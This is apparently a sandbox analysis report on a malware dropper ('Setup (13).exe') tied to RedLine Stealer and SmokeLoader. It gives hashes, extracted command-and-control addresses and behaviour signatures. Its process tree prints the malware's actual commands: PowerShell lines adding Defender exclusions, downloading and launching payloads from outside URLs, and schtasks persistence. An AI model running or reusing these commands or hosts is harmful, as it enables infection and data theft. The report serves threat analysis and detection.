Overview

overview

10

Static

static

Setup (1).exe

windows7_x64

10

Setup (1).exe

windows10_x64

10

Setup (10).exe

windows7_x64

10

Setup (10).exe

windows10_x64

10

Setup (11).exe

windows7_x64

10

Setup (11).exe

windows10_x64

10

Setup (12).exe

windows7_x64

10

Setup (12).exe

windows10_x64

10

Setup (13).exe

windows7_x64

10

Setup (13).exe

windows10_x64

10

Setup (14).exe

windows7_x64

10

Setup (14).exe

windows10_x64

10

Setup (15).exe

windows7_x64

10

Setup (15).exe

windows10_x64

10

Setup (16).exe

windows7_x64

10

Setup (16).exe

windows10_x64

10

Setup (17).exe

windows7_x64

10

Setup (17).exe

windows10_x64

10

Setup (18).exe

windows7_x64

10

Setup (18).exe

windows10_x64

10

Setup (19).exe

windows7_x64

10

Setup (19).exe

windows10_x64

10

Setup (2).exe

windows7_x64

10

Setup (2).exe

windows10_x64

10

Setup (20).exe

windows7_x64

10

Setup (20).exe

windows10_x64

10

Setup (21).exe

windows7_x64

10

Setup (21).exe

windows10_x64

10

Setup (22).exe

windows7_x64

10

Setup (22).exe

windows10_x64

10

Setup (23).exe

windows7_x64

10

Setup (23).exe

windows10_x64

10

Resubmissions

15-10-2024 15:36

241015-s1zlzasdkc 10

01-07-2024 18:32

240701-w6yteawhmq 10

01-07-2024 14:52

240701-r82wmaxdnd 10

01-07-2024 14:52

240701-r8syqa1dpp 10

11-03-2024 21:22

240311-z8dsssgg58 10

01-09-2021 13:18

210901-5bmxjspa5s 10

01-09-2021 13:04

210901-te4btfspqa 10

01-09-2021 05:12

210901-4wnkwm1p3j 10

31-08-2021 21:47

210831-41rp97dma2 10

31-08-2021 19:51

210831-359awwatje 10

Analysis

  • max time kernel
    429s
  • max time network
    1830s
  • platform
    windows7_x64
  • resource
    win7v20210408
  • submitted
    21-08-2021 10:21

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    Setup (13).exe

  • Size

    631KB

  • MD5

    cb927513ff8ebff4dd52a47f7e42f934

  • SHA1

    0de47c02a8adc4940a6c18621b4e4a619641d029

  • SHA256

    fd5c970806fba1500cbb6af5328329aeb43b8de3f02d90ec5d8cd1d57711622f

  • SHA512

    988c8fd886a9155b7d190faf2ce6b34d910efcffcf1c6251f18a9d0c804a0ea26a89679273033ac98b200363c536426efd1ae9de445c34e660369abb06f0071c

Score
10/10
redlinesmokeloader19.0820_8_rs@gerhdhddibildsecond_7.5kwwwbackdoordiscoveryevasioninfostealerspywarestealerthemidatrojan

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

https://dl.uploadgram.me/6120bc6269f31h?raw

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

https://dl.uploadgram.me/6120bcfeb5393h?raw

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

https://dl.uploadgram.me/6120c8f91373ch?raw

Extracted

Family

redline

Botnet

www

C2

185.204.109.146:54891

Extracted

Family

redline

Botnet

Second_7.5K

C2

45.14.49.200:27625

Extracted

Family

smokeloader

Version

2020

C2

http://aucmoney.com/upload/

http://thegymmum.com/upload/

http://atvcampingtrips.com/upload/

http://kuapakualaman.com/upload/

http://renatazarazua.com/upload/

http://nasufmutlu.com/upload/
rc4.i32
rc4.i32

Extracted

Family

redline

C2

205.185.119.191:18846

Extracted

Family

redline

Botnet

dibild

C2

135.148.139.222:33569

Extracted

Family

redline

Botnet

20_8_rs

C2

jekorikani.xyz:80

Extracted

Family

redline

Botnet

19.08

C2

95.181.172.100:6795

Extracted

Family

redline

Botnet

@Gerhdhd

C2

46.8.19.177:41228

Signatures

  • Modifies Windows Defender Real-time Protection settings 3 TTPs
    evasiontrojan
  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

    infostealerredline
  • RedLine Payload 20 IoCs
  • SmokeLoader

    Modular backdoor trojan in use since 2014.

    trojanbackdoorsmokeloader
  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
    evasion
  • Blocklisted process makes network request 3 IoCs
  • Downloads MZ/PE file
  • Executes dropped EXE 38 IoCs
  • Checks BIOS information in registry 2 TTPs 10 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Loads dropped DLL 45 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

    spywarestealer
  • Themida packer 12 IoCs

    Detects Themida, an advanced Windows software protection system.

    themida
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
    spyware
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

    discovery
  • Checks whether UAC is enabled 1 TTPs 5 IoCs
    evasiontrojan
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 3 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Suspicious use of NtSetInformationThreadHideFromDebugger 5 IoCs
  • Suspicious use of SetThreadContext 4 IoCs
  • Drops file in Program Files directory 5 IoCs
  • Drops file in Windows directory 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 2 IoCs
  • Checks SCSI registry key(s) 3 TTPs 6 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 3 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

    persistence
  • Kills process with taskkill 1 IoCs
    evasion
  • Modifies data under HKEY_USERS 64 IoCs
  • Modifies system certificate store 2 TTPs 13 IoCs
    evasionspywaretrojan
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 2 IoCs
  • Suspicious behavior: MapViewOfSection 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 38 IoCs
  • Suspicious use of FindShellTrayWindow 4 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\Setup (13).exe
    "C:\Users\Admin\AppData\Local\Temp\Setup (13).exe"
    1⤵
    • Checks computer location settings
    • Loads dropped DLL
    • Modifies system certificate store
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of WriteProcessMemory
    PID:1968
    • C:\Users\Admin\Documents\hKLxWAmB6h_lA9ugEvBwxrPL.exe
      "C:\Users\Admin\Documents\hKLxWAmB6h_lA9ugEvBwxrPL.exe"
      2⤵
      • Executes dropped EXE
      • Suspicious use of AdjustPrivilegeToken
      PID:1768
    • C:\Users\Admin\Documents\98YNxWCS2514X0PHpDcFbBcb.exe
      "C:\Users\Admin\Documents\98YNxWCS2514X0PHpDcFbBcb.exe"
      2⤵
      • Executes dropped EXE
      • Suspicious use of SetThreadContext
      PID:752
      • C:\Users\Admin\Documents\98YNxWCS2514X0PHpDcFbBcb.exe
        C:\Users\Admin\Documents\98YNxWCS2514X0PHpDcFbBcb.exe
        3⤵
        • Executes dropped EXE
        PID:2628
      • C:\Users\Admin\Documents\98YNxWCS2514X0PHpDcFbBcb.exe
        C:\Users\Admin\Documents\98YNxWCS2514X0PHpDcFbBcb.exe
        3⤵
        • Executes dropped EXE
        • Suspicious use of AdjustPrivilegeToken
        PID:2520
    • C:\Users\Admin\Documents\YZT8Iy2essV8eBCyCTScl2gF.exe
      "C:\Users\Admin\Documents\YZT8Iy2essV8eBCyCTScl2gF.exe"
      2⤵
      • Executes dropped EXE
      • Suspicious use of AdjustPrivilegeToken
      PID:1072
    • C:\Users\Admin\Documents\BCtt60lUb4bJD5DgNhLBbnte.exe
      "C:\Users\Admin\Documents\BCtt60lUb4bJD5DgNhLBbnte.exe"
      2⤵
      • Executes dropped EXE
      • Suspicious use of SetThreadContext
      PID:1940
      • C:\Users\Admin\Documents\BCtt60lUb4bJD5DgNhLBbnte.exe
        C:\Users\Admin\Documents\BCtt60lUb4bJD5DgNhLBbnte.exe
        3⤵
        • Executes dropped EXE
        • Suspicious use of AdjustPrivilegeToken
        PID:2300
    • C:\Users\Admin\Documents\jUZ6li9WSRNIcgHJz6js3sqb.exe
      "C:\Users\Admin\Documents\jUZ6li9WSRNIcgHJz6js3sqb.exe"
      2⤵
      • Executes dropped EXE
      PID:1612
      • C:\Windows\System32\cmd.exe
        "C:\Windows\System32\cmd.exe" /c powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%SystemRoot%' & powershell (New-Object System.Net.WebClient).DownloadFile('https://dl.uploadgram.me/6120bc6269f31h?raw', '%Temp%\\installer.exe') & powershell (New-Object System.Net.WebClient).DownloadFile('https://dl.uploadgram.me/6120bcfeb5393h?raw', '%AppData%\\RuntimeBroker.exe') & powershell (New-Object System.Net.WebClient).DownloadFile('https://dl.uploadgram.me/6120c8f91373ch?raw', '%Temp%\\launcher.exe') & powershell Start-Process -FilePath '%Temp%\\installer.exe' & powershell Start-Process -FilePath '%AppData%\\RuntimeBroker.exe' & powershell Start-Process -FilePath '%Temp%\\launcher.exe' & exit
        3⤵
          PID:2932
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming'
            4⤵
            • Suspicious use of AdjustPrivilegeToken
            PID:600
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp'
            4⤵
            • Suspicious use of AdjustPrivilegeToken
            PID:2636
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin'
            4⤵
            • Suspicious use of AdjustPrivilegeToken
            PID:3064
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            powershell -Command Add-MpPreference -ExclusionPath 'C:\Windows'
            4⤵
              PID:2700
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              powershell (New-Object System.Net.WebClient).DownloadFile('https://dl.uploadgram.me/6120bc6269f31h?raw', 'C:\Users\Admin\AppData\Local\Temp\\installer.exe')
              4⤵
              • Blocklisted process makes network request
              • Suspicious use of AdjustPrivilegeToken
              PID:2772
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              powershell (New-Object System.Net.WebClient).DownloadFile('https://dl.uploadgram.me/6120bcfeb5393h?raw', 'C:\Users\Admin\AppData\Roaming\\RuntimeBroker.exe')
              4⤵
              • Blocklisted process makes network request
              • Suspicious use of AdjustPrivilegeToken
              PID:3068
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              powershell (New-Object System.Net.WebClient).DownloadFile('https://dl.uploadgram.me/6120c8f91373ch?raw', 'C:\Users\Admin\AppData\Local\Temp\\launcher.exe')
              4⤵
                PID:2844
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                powershell Start-Process -FilePath 'C:\Users\Admin\AppData\Local\Temp\\installer.exe'
                4⤵
                  PID:1680
                  • C:\Users\Admin\AppData\Local\Temp\installer.exe
                    "C:\Users\Admin\AppData\Local\Temp\installer.exe"
                    5⤵
                      PID:3460
                      • C:\Windows\system32\cmd.exe
                        "cmd" /c powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & powershell -Command Add-MpPreference -ExclusionPath '%SystemRoot%' & exit
                        6⤵
                          PID:1532
                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin'
                            7⤵
                              PID:3884
                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming'
                              7⤵
                                PID:2412
                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp'
                                7⤵
                                  PID:1276
                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  powershell -Command Add-MpPreference -ExclusionPath 'C:\Windows'
                                  7⤵
                                    PID:2616
                                • C:\Windows\System32\cmd.exe
                                  "C:\Windows\System32\cmd.exe" /c C:\Users\Admin\AppData\Local\Temp\svchost32.exe "C:\Users\Admin\AppData\Local\Temp\installer.exe"
                                  6⤵
                                    PID:2056
                                    • C:\Users\Admin\AppData\Local\Temp\svchost32.exe
                                      C:\Users\Admin\AppData\Local\Temp\svchost32.exe "C:\Users\Admin\AppData\Local\Temp\installer.exe"
                                      7⤵
                                        PID:2740
                                        • C:\Windows\System32\cmd.exe
                                          "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services32" /tr '"C:\Windows\system32\services32.exe"' & exit
                                          8⤵
                                            PID:3076
                                            • C:\Windows\system32\schtasks.exe
                                              schtasks /create /f /sc onlogon /rl highest /tn "services32" /tr '"C:\Windows\system32\services32.exe"'
                                              9⤵
                                              • Creates scheduled task(s)
                                              PID:2984
                                          • C:\Windows\system32\services32.exe
                                            "C:\Windows\system32\services32.exe"
                                            8⤵
                                              PID:3140
                                              • C:\Windows\system32\cmd.exe
                                                "cmd" /c powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & powershell -Command Add-MpPreference -ExclusionPath '%SystemRoot%' & exit
                                                9⤵
                                                  PID:3992
                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin'
                                                    10⤵
                                                    • Blocklisted process makes network request
                                                    PID:2300
                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming'
                                                    10⤵
                                                      PID:920
                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp'
                                                      10⤵
                                                        PID:1548
                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        powershell -Command Add-MpPreference -ExclusionPath 'C:\Windows'
                                                        10⤵
                                                          PID:1000
                                                      • C:\Windows\System32\cmd.exe
                                                        "C:\Windows\System32\cmd.exe" /c C:\Users\Admin\AppData\Local\Temp\svchost32.exe "C:\Windows\system32\services32.exe"
                                                        9⤵
                                                          PID:1928
                                                          • C:\Users\Admin\AppData\Local\Temp\svchost32.exe
                                                            C:\Users\Admin\AppData\Local\Temp\svchost32.exe "C:\Windows\system32\services32.exe"
                                                            10⤵
                                                              PID:3644
                                                              • C:\Windows\System32\cmd.exe
                                                                "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services32" /tr '"C:\Windows\system32\services32.exe"' & exit
                                                                11⤵
                                                                  PID:3904
                                                                  • C:\Windows\system32\schtasks.exe
                                                                    schtasks /create /f /sc onlogon /rl highest /tn "services32" /tr '"C:\Windows\system32\services32.exe"'
                                                                    12⤵
                                                                    • Creates scheduled task(s)
                                                                    PID:3816
                                                                • C:\Windows\system32\Microsoft\Telemetry\sihost32.exe
                                                                  "C:\Windows\system32\Microsoft\Telemetry\sihost32.exe"
                                                                  11⤵
                                                                    PID:3900
                                                                  • C:\Windows\System32\cmd.exe
                                                                    "C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\svchost32.exe"
                                                                    11⤵
                                                                      PID:3652
                                                                      • C:\Windows\system32\choice.exe
                                                                        choice /C Y /N /D Y /T 3
                                                                        12⤵
                                                                          PID:864
                                                                • C:\Windows\System32\cmd.exe
                                                                  "C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\svchost32.exe"
                                                                  8⤵
                                                                    PID:2532
                                                                    • C:\Windows\system32\choice.exe
                                                                      choice /C Y /N /D Y /T 3
                                                                      9⤵
                                                                        PID:3124
                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                              powershell Start-Process -FilePath 'C:\Users\Admin\AppData\Roaming\\RuntimeBroker.exe'
                                                              4⤵
                                                                PID:2028
                                                                • C:\Users\Admin\AppData\Roaming\RuntimeBroker.exe
                                                                  "C:\Users\Admin\AppData\Roaming\RuntimeBroker.exe"
                                                                  5⤵
                                                                    PID:1240
                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                  powershell Start-Process -FilePath 'C:\Users\Admin\AppData\Local\Temp\\launcher.exe'
                                                                  4⤵
                                                                    PID:1584
                                                                    • C:\Users\Admin\AppData\Local\Temp\launcher.exe
                                                                      "C:\Users\Admin\AppData\Local\Temp\launcher.exe"
                                                                      5⤵
                                                                        PID:3696
                                                                        • C:\Users\Admin\AppData\Local\Temp\launcher.exe
                                                                          "{path}"
                                                                          6⤵
                                                                            PID:3632
                                                                  • C:\Users\Admin\Documents\RyBE1qMZ9cWKbQn1GZuYEQjn.exe
                                                                    "C:\Users\Admin\Documents\RyBE1qMZ9cWKbQn1GZuYEQjn.exe"
                                                                    2⤵
                                                                    • Executes dropped EXE
                                                                    PID:1608
                                                                    • C:\Users\Admin\AppData\Roaming\4919889.exe
                                                                      "C:\Users\Admin\AppData\Roaming\4919889.exe"
                                                                      3⤵
                                                                        PID:3424
                                                                        • C:\Windows\system32\WerFault.exe
                                                                          C:\Windows\system32\WerFault.exe -u -p 3424 -s 1740
                                                                          4⤵
                                                                          • Program crash
                                                                          PID:3788
                                                                      • C:\Users\Admin\AppData\Roaming\4029637.exe
                                                                        "C:\Users\Admin\AppData\Roaming\4029637.exe"
                                                                        3⤵
                                                                          PID:2220
                                                                          • C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe
                                                                            "C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"
                                                                            4⤵
                                                                              PID:1652
                                                                          • C:\Users\Admin\AppData\Roaming\8853850.exe
                                                                            "C:\Users\Admin\AppData\Roaming\8853850.exe"
                                                                            3⤵
                                                                              PID:2568
                                                                          • C:\Users\Admin\Documents\LeeKCzrU8Y4sx3Rz3YcSn8vW.exe
                                                                            "C:\Users\Admin\Documents\LeeKCzrU8Y4sx3Rz3YcSn8vW.exe"
                                                                            2⤵
                                                                            • Executes dropped EXE
                                                                            • Suspicious use of SetThreadContext
                                                                            PID:1980
                                                                            • C:\Users\Admin\Documents\LeeKCzrU8Y4sx3Rz3YcSn8vW.exe
                                                                              C:\Users\Admin\Documents\LeeKCzrU8Y4sx3Rz3YcSn8vW.exe
                                                                              3⤵
                                                                              • Executes dropped EXE
                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                              PID:2504
                                                                          • C:\Users\Admin\Documents\109S01oV51BahE7P5FmiO7My.exe
                                                                            "C:\Users\Admin\Documents\109S01oV51BahE7P5FmiO7My.exe"
                                                                            2⤵
                                                                            • Executes dropped EXE
                                                                            • Suspicious use of SetThreadContext
                                                                            PID:2040
                                                                            • C:\Users\Admin\Documents\109S01oV51BahE7P5FmiO7My.exe
                                                                              C:\Users\Admin\Documents\109S01oV51BahE7P5FmiO7My.exe
                                                                              3⤵
                                                                              • Executes dropped EXE
                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                              PID:1504
                                                                          • C:\Users\Admin\Documents\qRG_IfzvZMtWyuZt1IW5wOCu.exe
                                                                            "C:\Users\Admin\Documents\qRG_IfzvZMtWyuZt1IW5wOCu.exe"
                                                                            2⤵
                                                                            • Executes dropped EXE
                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                            PID:1856
                                                                            • C:\Users\Admin\Documents\qRG_IfzvZMtWyuZt1IW5wOCu.exe
                                                                              "C:\Users\Admin\Documents\qRG_IfzvZMtWyuZt1IW5wOCu.exe"
                                                                              3⤵
                                                                              • Executes dropped EXE
                                                                              • Modifies data under HKEY_USERS
                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                              PID:2700
                                                                          • C:\Users\Admin\Documents\XgAOyfoaY_gWudB0duDCIif0.exe
                                                                            "C:\Users\Admin\Documents\XgAOyfoaY_gWudB0duDCIif0.exe"
                                                                            2⤵
                                                                            • Executes dropped EXE
                                                                            • Checks SCSI registry key(s)
                                                                            • Suspicious behavior: EnumeratesProcesses
                                                                            • Suspicious behavior: MapViewOfSection
                                                                            PID:268
                                                                          • C:\Users\Admin\Documents\hT4cFg82frtRHsFZ3p8gcUUq.exe
                                                                            "C:\Users\Admin\Documents\hT4cFg82frtRHsFZ3p8gcUUq.exe"
                                                                            2⤵
                                                                            • Executes dropped EXE
                                                                            • Checks BIOS information in registry
                                                                            • Checks whether UAC is enabled
                                                                            • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                            PID:1656
                                                                          • C:\Users\Admin\Documents\nMuZyyhT5O_3WsNSlSv73SXg.exe
                                                                            "C:\Users\Admin\Documents\nMuZyyhT5O_3WsNSlSv73SXg.exe"
                                                                            2⤵
                                                                            • Executes dropped EXE
                                                                            • Checks BIOS information in registry
                                                                            • Checks whether UAC is enabled
                                                                            • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                            • Modifies system certificate store
                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                            PID:1156
                                                                          • C:\Users\Admin\Documents\ZzKwPolpJs0022WeKwJpyQNw.exe
                                                                            "C:\Users\Admin\Documents\ZzKwPolpJs0022WeKwJpyQNw.exe"
                                                                            2⤵
                                                                            • Executes dropped EXE
                                                                            PID:1600
                                                                            • C:\Users\Admin\Documents\ZzKwPolpJs0022WeKwJpyQNw.exe
                                                                              "C:\Users\Admin\Documents\ZzKwPolpJs0022WeKwJpyQNw.exe" -q
                                                                              3⤵
                                                                              • Executes dropped EXE
                                                                              PID:2168
                                                                          • C:\Users\Admin\Documents\ClWH5U_Ry5tTIMV2LDfMvK7_.exe
                                                                            "C:\Users\Admin\Documents\ClWH5U_Ry5tTIMV2LDfMvK7_.exe"
                                                                            2⤵
                                                                            • Executes dropped EXE
                                                                            PID:796
                                                                          • C:\Users\Admin\Documents\Yoo8p966jHdZsA9XlwCAc2n0.exe
                                                                            "C:\Users\Admin\Documents\Yoo8p966jHdZsA9XlwCAc2n0.exe"
                                                                            2⤵
                                                                            • Executes dropped EXE
                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                            PID:1492
                                                                          • C:\Users\Admin\Documents\0lCH1Ut0rTj5YwZRc84Tmco6.exe
                                                                            "C:\Users\Admin\Documents\0lCH1Ut0rTj5YwZRc84Tmco6.exe"
                                                                            2⤵
                                                                            • Executes dropped EXE
                                                                            • Modifies system certificate store
                                                                            PID:1616
                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 1616 -s 884
                                                                              3⤵
                                                                              • Loads dropped DLL
                                                                              • Program crash
                                                                              • Suspicious behavior: GetForegroundWindowSpam
                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                              PID:2752
                                                                          • C:\Users\Admin\Documents\_gCsOx8e0Q1gmCuJDgeQu9c7.exe
                                                                            "C:\Users\Admin\Documents\_gCsOx8e0Q1gmCuJDgeQu9c7.exe"
                                                                            2⤵
                                                                            • Executes dropped EXE
                                                                            • Checks BIOS information in registry
                                                                            • Checks whether UAC is enabled
                                                                            • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                            PID:864
                                                                          • C:\Users\Admin\Documents\FnoYhdabwbrzrHiHCL15DRod.exe
                                                                            "C:\Users\Admin\Documents\FnoYhdabwbrzrHiHCL15DRod.exe"
                                                                            2⤵
                                                                            • Executes dropped EXE
                                                                            • Checks BIOS information in registry
                                                                            • Checks whether UAC is enabled
                                                                            • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                            PID:2024
                                                                          • C:\Users\Admin\Documents\10QMl_5nm37gIlOrnVRDddWt.exe
                                                                            "C:\Users\Admin\Documents\10QMl_5nm37gIlOrnVRDddWt.exe"
                                                                            2⤵
                                                                            • Executes dropped EXE
                                                                            • Loads dropped DLL
                                                                            • Drops file in Program Files directory
                                                                            PID:1724
                                                                            • C:\Program Files (x86)\Company\NewProduct\jooyu.exe
                                                                              "C:\Program Files (x86)\Company\NewProduct\jooyu.exe"
                                                                              3⤵
                                                                              • Executes dropped EXE
                                                                              • Loads dropped DLL
                                                                              PID:2552
                                                                              • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                4⤵
                                                                                • Executes dropped EXE
                                                                                PID:2720
                                                                              • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                4⤵
                                                                                • Executes dropped EXE
                                                                                PID:2916
                                                                              • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                4⤵
                                                                                  PID:2020
                                                                                • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                  C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                  4⤵
                                                                                    PID:3736
                                                                                • C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe
                                                                                  "C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe"
                                                                                  3⤵
                                                                                  • Executes dropped EXE
                                                                                  • Modifies system certificate store
                                                                                  PID:2600
                                                                                • C:\Program Files (x86)\Company\NewProduct\customer3.exe
                                                                                  "C:\Program Files (x86)\Company\NewProduct\customer3.exe"
                                                                                  3⤵
                                                                                    PID:2628
                                                                                • C:\Users\Admin\Documents\gHzyuVDqYz0a4TsmZpGoRkli.exe
                                                                                  "C:\Users\Admin\Documents\gHzyuVDqYz0a4TsmZpGoRkli.exe"
                                                                                  2⤵
                                                                                  • Executes dropped EXE
                                                                                  PID:1008
                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                    "C:\Windows\System32\cmd.exe" /c taskkill /im "gHzyuVDqYz0a4TsmZpGoRkli.exe" /f & erase "C:\Users\Admin\Documents\gHzyuVDqYz0a4TsmZpGoRkli.exe" & exit
                                                                                    3⤵
                                                                                      PID:2400
                                                                                      • C:\Windows\SysWOW64\taskkill.exe
                                                                                        taskkill /im "gHzyuVDqYz0a4TsmZpGoRkli.exe" /f
                                                                                        4⤵
                                                                                        • Kills process with taskkill
                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                        PID:2480
                                                                                • C:\Windows\system32\taskeng.exe
                                                                                  taskeng.exe {BDB4063D-C763-4DDE-84A4-9CA5916DB046} S-1-5-21-2455352368-1077083310-2879168483-1000:QWOCTUPM\Admin:Interactive:[1]
                                                                                  1⤵
                                                                                    PID:2940
                                                                                    • C:\Users\Admin\AppData\Roaming\grwbiru
                                                                                      C:\Users\Admin\AppData\Roaming\grwbiru
                                                                                      2⤵
                                                                                      • Executes dropped EXE
                                                                                      • Checks SCSI registry key(s)
                                                                                      • Suspicious behavior: MapViewOfSection
                                                                                      PID:2144
                                                                                    • C:\Users\Admin\AppData\Local\Temp\bd1299733e\rnyuf.exe
                                                                                      C:\Users\Admin\AppData\Local\Temp\bd1299733e\rnyuf.exe
                                                                                      2⤵
                                                                                      • Executes dropped EXE
                                                                                      PID:3720
                                                                                    • C:\Users\Admin\AppData\Local\Temp\bd1299733e\rnyuf.exe
                                                                                      C:\Users\Admin\AppData\Local\Temp\bd1299733e\rnyuf.exe
                                                                                      2⤵
                                                                                        PID:1956
                                                                                      • C:\Users\Admin\AppData\Roaming\grwbiru
                                                                                        C:\Users\Admin\AppData\Roaming\grwbiru
                                                                                        2⤵
                                                                                          PID:4016
                                                                                        • C:\Users\Admin\AppData\Local\Temp\bd1299733e\rnyuf.exe
                                                                                          C:\Users\Admin\AppData\Local\Temp\bd1299733e\rnyuf.exe
                                                                                          2⤵
                                                                                            PID:3500
                                                                                          • C:\Users\Admin\AppData\Roaming\grwbiru
                                                                                            C:\Users\Admin\AppData\Roaming\grwbiru
                                                                                            2⤵
                                                                                              PID:3700
                                                                                          • C:\Users\Admin\AppData\Local\Temp\6BDD.exe
                                                                                            C:\Users\Admin\AppData\Local\Temp\6BDD.exe
                                                                                            1⤵
                                                                                            • Executes dropped EXE
                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                            PID:1764
                                                                                          • C:\Users\Admin\AppData\Local\Temp\B7CC.exe
                                                                                            C:\Users\Admin\AppData\Local\Temp\B7CC.exe
                                                                                            1⤵
                                                                                            • Executes dropped EXE
                                                                                            • Checks BIOS information in registry
                                                                                            • Checks whether UAC is enabled
                                                                                            • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                            PID:2608
                                                                                          • C:\Users\Admin\AppData\Local\Temp\3BA.exe
